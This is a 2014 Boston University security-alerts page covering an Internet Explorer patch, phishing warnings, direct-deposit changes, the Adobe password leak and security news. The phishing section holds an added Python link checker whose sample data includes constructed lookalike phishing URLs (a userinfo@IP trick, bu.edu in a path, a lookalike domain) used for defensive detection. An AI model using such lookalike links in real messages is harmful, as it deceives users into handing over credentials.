The high-security login pilot will be followed by a voluntary opt-in for all BU community members that log in to BUworks beginning in July. You can learn more about the new higher-security login process at www.bu.edu/tech/duo/.

If you have any questions or concerns, please contact the IT Help Center online, via email at ithelp@bu.edu, or by phone at (617)353-HELP (4357).


Microsoft releases security patch for Internet Explorer. Update now.

May 1st, 2014 in Security Alerts for BU

Today Microsoft has released an out-of-band security update to address the issue affecting Internet Explorer (IE) that was first discussed in Microsoft Security Advisory 2963983.  (Details below).

The new security update MS14-021 – Security Update for Internet Explorer (2965111) is fully tested and ready for release for all affected versions of the browser.

By now you may have heard that US-CERT and a number of other large security organizations are recommending people stop using IE for a while until a security issue is resolved.

http://www.smh.com.au/it-pro/security-it/australia-us-uk-advise-avoiding-microsoft-internet-explorer-until-bug-fixed-20140428-zr11i.html

Security issues are discovered on a daily basis and, while we always need to act with an abundance of care and caution, we also need to really think through how we respond to events such as this.

The issue in the article above is serious, but exploiting it requires a user to visit a web page that hosts the attack. If a person only goes to the web pages they always go to – web pages associated with their normal business and life – the risk should not be too great. As a practical matter, there are many web sites that don’t work properly on anything other than Internet Explorer, so the advice to “stop using Internet Explorer” has little practical value for many people. Rather, we should look to provide guidance on how to reduce the risk generally, and particularly until the patch for this is applied.

A counterpoint to the above story is a recent report by an independent lab, NSS, that showed IE as being far and away the most effective at blocking tested malware at over 99%, with Chrome at 70% and Firefox and Safari at a dismal 4%. But these results are always changing as the focus of the bad guys changes to take advantage of different things, to keep people guessing. So this new issue hits and for the moment IE is in the spotlight.

One thing that you definitely need to do is stop using XP. It is no longer under support, more and more exploits will be hitting the wild from now on, and no one will be releasing fixes. Once your machine is breached, it will stay breached, and that will happen very quickly.

However, there are several things you can do to protect yourself against this particular issue and many others while continuing to use IE. Microsoft outlines a few of those here, but to summarize, the article suggests setting IE up in “Enhanced Security Configuration”, something that is good security practice anyway. These are the general steps:

  1. Go to IE > Internet Options
  2. Click on the Security tab
  3. Ensure that the following levels are set for each zone:
  • For the Internet zone, set the security level to High. This means that any site you browse to that is not in your Trusted sites zone will be prohibited from running scripts and dynamic content. This protects you from a large number of threats, but it also means that most of the sites you normally use will not work correctly until you put them into Trusted sites.
  • For the Trusted sites zone, set the security level to Medium, which allows dynamic content and normal operation of most Internet sites.
  • For the Local intranet zone, set the security level to Medium-low, which allows your user credentials (user name and password) to be sent automatically to sites and applications that need them.
  • For the Restricted sites zone, set the security level to High.
  4. Add the sites you normally use and trust to the Trusted sites zone so that they will work properly. This takes some time to set up the first time, but once you have done so, you will be much more secure moving into the future.

Quinn R Shamblin

Executive Director of Information Security, Boston University


Direct Deposit Reactivated on ESS

April 23rd, 2014 in Security Alerts for BU

Dear Colleagues,

Boston University is committed to securing the personal information of our faculty and staff. In light of the recent phishing events, the Direct Deposit banking information on Employee Self Service (ESS) was disabled as a security precaution. A working group was formed and has been working diligently to develop more robust security measures to safeguard our employees’ personal banking information.

We are pleased to announce starting February 19, 2014 the Direct Deposit Link on ESS is once again available for use. Enhancements have been made to the Direct Deposit application by adding Banking validation checks. You will now be asked for your Current MAIN Bank account information when making banking changes to your existing account. Newly hired employees may skip this field.

The working group is also looking at developing more advanced and long-term security solutions for the SAP Employee Self Service portal. We will have more information to share with you soon on these future improvements.
Thank you for your continued support. If you have any problems or questions related to Direct Deposit, please feel free to contact the Payroll Office at 617-353-2270 or e-mail bupay@bu.edu.

Sincerely,
Diane Tucker
Chief Human Resources Officer
Gillian Emmons
University Comptroller


Phishing continues

April 23rd, 2014 in Security Alerts for BU

The phishing scammers are at it again.

The phishing scammers are trying again. We have received several reports this morning of the message below being received by members of our community. This is the kind of phishing message we believe was responsible for the direct deposit problem we reported earlier this month, and the scammers are trying to use the fact that they were successful last time to continue and extend their crime. This message claims to be from security and talks about protecting you from the evils of phishing.

If you have already clicked on this message, please contact the IT Help Center for assistance with resetting your password.

The way you can really tell that this message is a fake is that it claims to be from BU, and it even uses our logos, but it sends you to a link that is not a bu.edu link.

A real BU link always has “.bu.edu/” in it, right where the host name ends:
there is always a dot before bu and always a slash after edu, and what comes before the dot is a BU host name (www, weblogin, and so on), not some other site’s address. “bu.edu” appearing later in the link, after the first single slash, does not count.

These are examples of legitimate URLs: http://www.bu.edu/tech/ and http://www.bu.edu/infosec/

You can see in the phishing message that they are trying to look like a BU URL by including “bu.edu”, but it is not preceded by a dot as shown above. A small, but crucial difference.


Another few things to look for:

  • If you are prompted to Web Login, make sure it is the authentic BU Web Login page which begins with https://weblogin.bu.edu/something
  • And remember that BU will NEVER ask you for your password or ask you to “verify” it; nor would any other legitimate business or institution. It is important that you safeguard your passwords and never give them to anyone.
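
The rule above is about where the host name of a link ends, and the first bullet point is about the genuine Web Login host over HTTPS. The following is an added example, not code from BU, that applies both checks with Python's URL parser instead of a substring search, so that a link such as http://203.0.113.9/.bu.edu/login (which contains “.bu.edu/” but points at an attacker's address) or https://weblogin.bu.edu@203.0.113.9/ (where the real host is whatever follows the “@”) is still rejected. The sample links are constructed for the example, and the function names are this example's own.

```python
from urllib.parse import urlsplit

TRUSTED_DOMAIN = "bu.edu"          # a real BU link is on this domain or a subdomain of it
WEBLOGIN_HOST = "weblogin.bu.edu"  # the only host that should ever ask for a BU password


def _split(url):
    """urlsplit() that also accepts links written without a scheme ("www.bu.edu/tech")."""
    url = url.strip()
    if "://" not in url:
        url = "http://" + url
    return urlsplit(url)


def hostname_of(url):
    """The host part of a link, lower-cased, ignoring any user@ prefix, port, path or query."""
    return (_split(url).hostname or "").lower()


def is_bu_link(url):
    """True only when the host is bu.edu itself or ends in '.bu.edu'.

    Checking the host rather than the whole string is what makes the rule
    hold: 'bu.edu' in the path (http://203.0.113.9/.bu.edu/) or inside a
    longer domain (bu.edu.account-verify.example) does not count.
    """
    host = hostname_of(url)
    return host == TRUSTED_DOMAIN or host.endswith("." + TRUSTED_DOMAIN)


def is_bu_weblogin(url):
    """True only for the genuine Web Login page: HTTPS and exactly weblogin.bu.edu."""
    parts = _split(url)
    return parts.scheme == "https" and (parts.hostname or "").lower() == WEBLOGIN_HOST


def classify_links(urls):
    """Map each link to 'bu-weblogin', 'bu' or 'not-bu' for a quick triage of a message."""
    result = {}
    for url in urls:
        if is_bu_weblogin(url):
            result[url] = "bu-weblogin"
        elif is_bu_link(url):
            result[url] = "bu"
        else:
            result[url] = "not-bu"
    return result


# Constructed sample links of the kinds seen in the messages above: two genuine,
# one plain-HTTP lookalike of the login page, and three imitations that contain
# the letters "bu.edu" somewhere other than the host.
SAMPLE_LINKS = [
    "http://www.bu.edu/tech/",
    "https://weblogin.bu.edu/login",
    "http://bu.edu.account-verify.example/weblogin",
    "http://203.0.113.9/.bu.edu/login",
    "https://weblogin.bu.edu@203.0.113.9/login",
    "http://weblogin.bu.edu/login",
]

if __name__ == "__main__":
    for url, verdict in classify_links(SAMPLE_LINKS).items():
        print(f"{verdict:12} {url}")
```

The last sample link is on a BU host but is flagged as an ordinary “bu” link rather than “bu-weblogin”, because the real login page is only ever served over HTTPS; a plain-HTTP copy asking for a password is exactly what the second bullet warns about.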

For more good ways to detect phishing, go to: http://www.bu.edu/infosec/howtos/how-to-detect-phishing/

Additional information on phishing is provided by IS&T at http://www.bu.edu/tech/phishing

Making your spam/phishing filter more effective

Mail that is clearly spam is filtered for you, automatically. However, one person’s spam might be another person’s research project, so other messages are simply tagged as suspicious and then allowed to go through. You can decide how to handle suspicious mail that does get through, following the tips for Managing Spam provided by IS&T at http://www.bu.edu/tech/comm/email/unwanted-email/spam/

Reporting Phishing

If you see a phishing message, please send it and full headers to abuse@bu.edu

For details on how to do this, see: http://www.bu.edu/tech/comm/email/unwanted-email/report-abuse/

Thank you all for your attention and help in fighting this problem.

Quinn R Shamblin

Executive Director of Information Security, Boston University

BU Security Tips: Keeping Safe & Secure for the Holidays and 2014

 In this digital age, we rely on our computers and devices for so many aspects of our lives that the need to be proactive and vigilant to protect against cyber threats has never been greater. Included in this article are several best practice strategies for strengthening defenses!


Adobe Leaked Passwords – if you haven’t changed your password, please do so now

If you have ever created an account with Adobe to download or register any of their products, please change your Adobe password immediately and be sure to change the password of any account that shares this password.   To change your BU password, go to:  http://www.bu.edu/tech/accounts/kerberos/reset/

Adobe was recently the victim of a hack [1] in which over 153 million accounts, along with their passwords and password hints, were exposed. BU InfoSec has analyzed the information that was made public to find risks to our users and found that over 9,000 of these accounts belong to users who signed up with Boston University email addresses.

To keep yourself safe in the future, do not use the same password for multiple accounts and use a password manager [2] to store each unique password and keep them all safe.

If you need any assistance or are concerned about the security of your BU Kerberos account, contact the BU Help Desk at (617) 353-HELP or ithelp@bu.edu.

[1] http://blogs.adobe.com/conversations/2013/10/important-customer-security-announcement.html
[2] http://www.bu.edu/infosec/howtos/password-management/

Cryptolocker: How to avoid getting infected and what to do if you are

ComputerWorld: There’s a new piece of ransomware circling the internet – Cryptolocker comes in the door through social engineering. Usually the virus payload hides in an attachment to a phishing message, one purporting to be from a business copier like Xerox that is delivering a PDF of a scanned image, from a major delivery service like UPS or FedEx offering tracking information, or from a bank letter confirming a wire or money transfer.

Here’s how to protect yourself from this threat

If you believe you’ve been infected, visit this link for help: http://www.bleepingcomputer.com/virus-removal/cryptolocker-ransomware-information

Android banking malware with a twist in the delivery

Naked Security: “…Mobile malware that reads your SMSes before you do can steal important data such as the two-factor authentication (2FA) codes sent by your email provider or your bank, giving cybercriminals a way into your account despite the extra layer of protection in place.”

The FBI has arrested five people, two of whom ran websites, on suspicion of offering or using hacking-on-demand services. The FBI said that it has picked up two website operators and three users in an international operation involving the cooperation of Romanian, Indian and Chinese authorities. The five domestic suspects, from Arkansas, California, Michigan and New York, have been charged with obtaining unauthorized access to email accounts.

Craft store Michaels faces second credit card compromise in 3 years

Naked Security: Michaels, the largest arts and crafts store in North America, has acknowledged it may be the latest victim of malware targeting point-of-sale (PoS or cash register) computers.

Feds to Charge Alleged SpyEye Trojan Author

Krebs On Security: Federal authorities in Atlanta today are expected to announce the arrest and charging of a 24-year-old Russian man who allegedly created and maintained the SpyEye Trojan, a sophisticated botnet creation kit that has been implicated in a number of costly online banking thefts against businesses and consumers.

Target admits “there was malware on our point-of-sale registers”

Naked Security: “The Target data breach story has turned into a bit of a bus: it’s big, has lots of momentum, and three just came along at once.”

Java-based malware driving DDoS botnet infects Windows, Mac, Linux devices

Ars Technica: “Multi-platform threat exploits old Java flaw, gains persistence.”

Deconstructing the $9.84 Credit Card Hustle

Krebs On Security: “Over the holidays, I heard from a number of readers who were seeing strange, unauthorized charges showing up on their credit and debit cards for $9.84. Many wondered whether this was the result of the Target breach; I suppose I asked for this, having repeatedly advised readers to keep a close eye on their bank statements for bogus transactions. It’s still not clear how consumers’ card numbers are being stolen here, but the fraud appears to stem from an elaborate network of affiliate schemes that stretch from Cyprus to India and the United Kingdom.”

FBI warns of crimewave hitting cash registers

Naked Security: “The US Federal Bureau of Investigations (FBI) has warned retailers to harden their defences against cyber-heists – particularly those that latch onto credit card details from shoppers, as apparently happened to Target”

Stop Asking Me for My Email Address

New York Times: “I explained, as I have a hundred times before, that I’m a paranoid security reporter who makes it a general rule of thumb not to hand out information unnecessarily.”

Apple.com does more to protect your password, study of top 100 sites finds

Ars Technica: Which sites allow “123456”? Study names/shames the best/worst password policies.